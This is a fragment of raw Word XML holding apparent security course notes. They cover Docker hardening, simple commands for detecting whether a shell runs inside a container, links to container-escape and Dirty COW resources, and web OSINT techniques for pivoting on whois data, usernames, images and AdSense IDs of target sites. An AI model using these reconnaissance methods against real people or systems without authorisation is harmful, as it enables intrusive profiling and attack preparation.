        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Principle of Least Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC9A98" w14:textId="53DD9980" w:rsidR="007D3682" w:rsidRDefault="007D3682" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Docker Seccomp 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7756AFD8" w14:textId="2301839E" w:rsidR="007D3682" w:rsidRDefault="007D3682" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Securing Daemons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C231028" w14:textId="458B5B95" w:rsidR="007D3682" w:rsidRDefault="007D3682" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Determining if inside Container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E454F54" w14:textId="59551DBA" w:rsidR="007D3682" w:rsidRDefault="007D3682" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Listing Running Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3162537F" w14:textId="01CD13DE" w:rsidR="007D3682" w:rsidRDefault="007D3682" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337FE2B9" w14:textId="19B7FC54" w:rsidR="008B4A0C" w:rsidRDefault="008B4A0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Looking for .dockerenv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257E4D4" w14:textId="56194F06" w:rsidR="008B4A0C" w:rsidRDefault="008B4A0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cd / &amp;&amp; ls -lah</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F988C0" w14:textId="37F1A3F1" w:rsidR="008B4A0C" w:rsidRDefault="008B4A0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cgroups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B17FC" w14:textId="0FD17C77" w:rsidR="008B4A0C" w:rsidRDefault="008B4A0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cd /proc/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A08A4A" w14:textId="1FF0570A" w:rsidR="008B4A0C" w:rsidRDefault="008B4A0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cat cgroups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6247EB8E" w14:textId="232DF3EB" w:rsidR="008B4A0C" w:rsidRDefault="008B4A0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for Docker terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F34089" w14:textId="74A3562D" w:rsidR="008B4A0C" w:rsidRDefault="008B4A0C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392E03F8" w14:textId="5E06FA0B" w:rsidR="008B4A0C" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId200" w:history="1">
        <w:r w:rsidR="008B4A0C" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/dirtycow/dirtycow.github.io</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1409F505" w14:textId="2F451ABE" w:rsidR="008B4A0C" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId201" w:history="1">
        <w:r w:rsidR="008B4A0C" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23BE7B3E" w14:textId="09EFAE51" w:rsidR="008B4A0C" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId202" w:anchor=":~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so" w:history="1">
        <w:r w:rsidR="008B4A0C" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008B4A0C" w:rsidRPr="008B4A0C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DB71A5" w14:textId="61F269C3" w:rsidR="008B4A0C" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId203" w:history="1">
        <w:r w:rsidR="008B4A0C" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.google.com/presentation/d/1WdByuxWgayPb-RstO-XaENSqVPGP7h6t3GS6W4jk4tk/htmlpresent</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F99E530" w14:textId="06064EB1" w:rsidR="008B4A0C" w:rsidRDefault="008B4A0C" w:rsidP="008B4A0C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6BD8A3" w14:textId="5E475DD2" w:rsidR="008B4A0C" w:rsidRDefault="0093232E" w:rsidP="008B4A0C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Web OSINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E72923" w14:textId="1FD4807D" w:rsidR="0093232E" w:rsidRDefault="0093232E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Whois Registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365201EB" w14:textId="15E9AF05" w:rsidR="0093232E" w:rsidRDefault="003819CB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>lookup.icann.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EC16DA" w14:textId="0020C3D4" w:rsidR="003819CB" w:rsidRDefault="003819CB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>data used for pivot points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04054ADA" w14:textId="00F3E2F7" w:rsidR="003819CB" w:rsidRDefault="003819CB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>email or physical address, phone number, registrar/registrant names, nameserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2756D3D5" w14:textId="1F440885" w:rsidR="009A7C02" w:rsidRDefault="009A7C02" w:rsidP="009A7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10078FF1" w14:textId="24F6EC64" w:rsidR="009A7C02" w:rsidRDefault="00BB0551" w:rsidP="009A7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>.svg extensions can hide a lot of macro information within an image when it is generated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD78C2D" w14:textId="5A418DA8" w:rsidR="00874682" w:rsidRDefault="00874682" w:rsidP="009A7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Yandex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE443EB" w14:textId="69BEA2F4" w:rsidR="00874682" w:rsidRDefault="00874682" w:rsidP="00874682">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>crop images to special points of interest within photo foreground or background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517E4DC5" w14:textId="56DF7F7A" w:rsidR="0085756B" w:rsidRDefault="0085756B" w:rsidP="0085756B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reverse image search in google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E81AE46" w14:textId="53DA1479" w:rsidR="00BB0551" w:rsidRDefault="00BB0551" w:rsidP="00BB0551">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70505B11" w14:textId="226DA846" w:rsidR="00BB0551" w:rsidRDefault="00BB0551" w:rsidP="00BB0551">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Spiderfoot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD4CD6" w14:textId="6B230BFE" w:rsidR="00BB0551" w:rsidRDefault="00BB0551" w:rsidP="00BB0551">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>whatsmyname.app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A900A15" w14:textId="4BF47F3E" w:rsidR="00BB0551" w:rsidRDefault="00BB0551" w:rsidP="00BB0551">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Websites Discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC24B41" w14:textId="05D51393" w:rsidR="00BB0551" w:rsidRDefault="00BB0551" w:rsidP="00BB0551">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>repositories, reddit, twitter, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5C9A75" w14:textId="7D3759B7" w:rsidR="00BB0551" w:rsidRDefault="00BB0551" w:rsidP="00BB0551">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PGP keys and other publicized projects and information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F79C534" w14:textId="73087249" w:rsidR="00076860" w:rsidRDefault="00076860" w:rsidP="00076860">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>save as .asc file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152D7166" w14:textId="030EE67E" w:rsidR="00BB0551" w:rsidRDefault="00BB0551" w:rsidP="00BB0551">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use gpg </w:t>
      </w:r>
      <w:r w:rsidR="00076860">
        <w:t>- -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidR="00076860">
        <w:t xml:space="preserve">&lt;file&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>or cleopatra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BBB5A" w14:textId="5CAF2814" w:rsidR="00BB0551" w:rsidRDefault="00BB0551" w:rsidP="00BB0551">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Look through everything for potential useful information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A172B6" w14:textId="752B745A" w:rsidR="005838D7" w:rsidRDefault="005838D7" w:rsidP="005838D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DeepPaste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1B92D0" w14:textId="1FF5206B" w:rsidR="005838D7" w:rsidRDefault="005838D7" w:rsidP="005838D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>MD5 hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E97DD8" w14:textId="0FB4C504" w:rsidR="00874682" w:rsidRDefault="00874682" w:rsidP="00874682">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Wigle.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666CB02C" w14:textId="723C1705" w:rsidR="003819CB" w:rsidRDefault="003819CB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Archive</w:t>
      </w:r>
      <w:r w:rsidR="008E7EBE">
        <w:t>.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C169A" w14:textId="52B8EA03" w:rsidR="008E7EBE" w:rsidRDefault="008E7EBE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>and Internet Wayback Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF765D8" w14:textId="4347BD8C" w:rsidR="008E7EBE" w:rsidRDefault="008E7EBE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>archived pages for viewing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F7CCD" w14:textId="082D1FF4" w:rsidR="008E7EBE" w:rsidRDefault="008E7EBE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ViewDNS.info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F7B0E" w14:textId="431AD664" w:rsidR="008E7EBE" w:rsidRDefault="00652416" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>looking up registration information on target website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779F83FB" w14:textId="5ABC5551" w:rsidR="00652416" w:rsidRDefault="00652416" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shared or hosted IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0621E8D5" w14:textId="5A6A2A26" w:rsidR="00652416" w:rsidRDefault="00652416" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hint at budget and traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DFCEFE" w14:textId="2A8AB2E9" w:rsidR="00652416" w:rsidRDefault="00652416" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>IP History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FE64BF" w14:textId="056D8498" w:rsidR="00652416" w:rsidRDefault="00652416" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reverse IP Lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55847D88" w14:textId="03F51B71" w:rsidR="00652416" w:rsidRDefault="00652416" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if there are numerous domains related to IP, likely shared and for a low budget site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A6FE0" w14:textId="609AA1B1" w:rsidR="00C47976" w:rsidRDefault="00C47976" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Website Quality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739E1F0" w14:textId="5EE6C09D" w:rsidR="00C47976" w:rsidRDefault="00C47976" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>language, UX, site pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557825D2" w14:textId="09B3ADA5" w:rsidR="00C47976" w:rsidRDefault="00C47976" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SEO best practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D193BDA" w14:textId="680732A6" w:rsidR="00C47976" w:rsidRDefault="00C47976" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772EFF90" w14:textId="6F96D55C" w:rsidR="00C47976" w:rsidRDefault="00C47976" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>comments, email addresses, publisher or AdSense ID, image file extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0884265B" w14:textId="25325C78" w:rsidR="00C47976" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId204" w:history="1">
        <w:r w:rsidR="00C47976" w:rsidRPr="00E72ED1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nixintel.info/osint/12-osint-resources-for-e-mail-addresses/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FF158C6" w14:textId="22116136" w:rsidR="00C47976" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId205" w:history="1">
        <w:r w:rsidR="00C47976" w:rsidRPr="00E72ED1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://support.google.com/adsense/answer/105516?hl=en</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64435F4A" w14:textId="4299F153" w:rsidR="00C47976" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId206" w:history="1">
        <w:r w:rsidR="00C47976" w:rsidRPr="00E72ED1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.bellingcat.com/resources/how-tos/2015/07/23/unveiling-hidden-connections-with-google-analytics-ids/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D5FA0A7" w14:textId="10550A2C" w:rsidR="00C47976" w:rsidRDefault="00353F2F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nerdydata.com – check for other uses of AdSense ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2973E6F1" w14:textId="3456E0ED" w:rsidR="00353F2F" w:rsidRDefault="00353F2F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Commonalities</w:t>
      </w:r>
    </w:p>
